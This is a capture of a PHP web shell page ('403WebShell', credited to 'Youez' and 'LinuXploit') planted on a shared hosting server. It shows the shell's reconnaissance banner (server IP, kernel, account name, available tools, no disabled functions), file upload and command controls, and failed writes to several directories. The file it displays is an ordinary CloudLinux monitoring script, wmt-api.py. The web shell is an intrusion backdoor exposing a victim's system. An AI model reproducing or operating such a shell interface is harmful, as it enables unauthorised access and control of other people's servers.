Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.119.116.125
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib64/python3.11/site-packages/wmt/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib64/python3.11/site-packages/wmt/wmt-api.py
#!/opt/cloudlinux/venv/bin/python3

import json
import fcntl
import os
import time
import sys
import psutil
import signal
from argparse import ArgumentParser
from datetime import datetime, timedelta

from wmt.common.const import (
    WMT_SCANNER_SERVICE,
    WMT_LOCK_FILE,
    CONFIG_PATH,
    WMT_DB
)

from wmt.common.report import generate_report, report_dict
from wmt.db import setup_database
from wmt.common.service import set_service_state
from wmt.common.notification import Notifier, SupportedNotificationTypes
from wmt.common import cfg

from cllicense import CloudlinuxLicenseLib
from wmt.common.utils import send_report_to_clickhouse, manage_crons


def print_result_and_exit(result='success', exit_code=0, **extra):
    message = {
        'result': result,
        'timestamp': time.time()
    }
    message.update(extra)
    print(json.dumps(message,
                     indent=2,
                     sort_keys=True))
    sys.exit(exit_code)


def get_status():
    if not os.path.exists(WMT_LOCK_FILE):
        return 'stopped'
    with open(WMT_LOCK_FILE) as f:
        try:
            fcntl.flock(f.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
        # locked
        except OSError:
            return 'started'
    return 'stopped'


def get_scanner_pid():
    if not os.path.exists(WMT_LOCK_FILE):
        return
    with open(WMT_LOCK_FILE) as f:
        pid = int(f.read().strip())
    return pid if psutil.pid_exists(pid) else None


def get_config():
    return cfg.to_dict()


def change_config(new_json_config):
    config = cfg.modify(new_json_config)
    scanner_pid = get_scanner_pid()
    if scanner_pid is not None:
        os.kill(scanner_pid, signal.SIGUSR1)
    return config


def run():
    args = ArgumentParser()
    args.add_argument('--config-get', action='store_true')
    args.add_argument('--config-change', type=str)

    args.add_argument('--report-get', action='store_true')
    args.add_argument('--send-clickhouse', action='store_true')
    # just for 24h report by mail executed by cron
    args.add_argument('--send-email', action='store_true')

    args.add_argument('--status', action='store_true')
    args.add_argument('--start', action='store_true')
    args.add_argument('--stop', action='store_true')

    opts = args.parse_args()

    if opts.config_get:
        config = get_config()
        config['default_report_email'] = cfg.default_report_email

        if config.get("ignore_list"):
            tmp_val = ",".join(config.get("ignore_list"))
            config['ignore_list'] = tmp_val
        print_result_and_exit(config=config)

    elif opts.config_change:
        config = change_config(opts.config_change)
        config['default_report_email'] = cfg.default_report_email
        print_result_and_exit(config=config)

    elif opts.report_get:
        engine = setup_database(readonly=os.path.exists(WMT_DB))
        # 24h back from NOW
        start, end = datetime.now() - timedelta(days=1), datetime.now()
        report = report_dict(generate_report(engine, start, end))
        print_result_and_exit(report=report, date=datetime.now().strftime('%Y-%m-%d %H:%M'))
    elif opts.send_clickhouse:
        engine = setup_database(readonly=True)
        # for the day before
        start, end = datetime.now().date() - timedelta(days=1), datetime.now().date()
        send_report_to_clickhouse(report_dict(generate_report(engine, start, end)))
        print_result_and_exit()
    elif opts.send_email:
        is_scanner_running = get_status() == 'started'
        if is_scanner_running and cfg.cfg.summary_notification_enabled:
            if not CloudlinuxLicenseLib().get_license_status():
                print_result_and_exit('CloudLinux license is expired. '
                                      'You may buy new license here: https://lp.cloudlinux.com/cloudlinux-os-solo',
                                      exit_code=1)
            engine = setup_database()
            start, end = datetime.now().date() - timedelta(days=1), datetime.now().date()
            report = generate_report(engine, start, end)
            Notifier(
                target_email=cfg.target_email,
                from_email=cfg.from_email,
                report=report, notification_type=SupportedNotificationTypes.REPORT,
            ).notify()
            print_result_and_exit()
        else:
            print_result_and_exit('Summary report email will not be sent! '
                                  f'Please, ensure "{WMT_SCANNER_SERVICE}" service is running and '
                                  f'alert_notifications is enabled in "{CONFIG_PATH}"', exit_code=1)
    elif opts.status:
        status = get_status()
        print_result_and_exit(status=status)
    elif opts.start:
        set_service_state(WMT_SCANNER_SERVICE, 'start')
        manage_crons(status=True)
        print_result_and_exit()
    elif opts.stop:
        set_service_state(WMT_SCANNER_SERVICE, 'stop')
        manage_crons(status=False)
        print_result_and_exit()
    else:
        args.print_help()


def main():
    try:
        run()
    except Exception as e:
        print_result_and_exit(result='error', exit_code=1, context=str(e))


if __name__ == '__main__':
    main()

Youez - 2016 - github.com/yon3zu
LinuXploit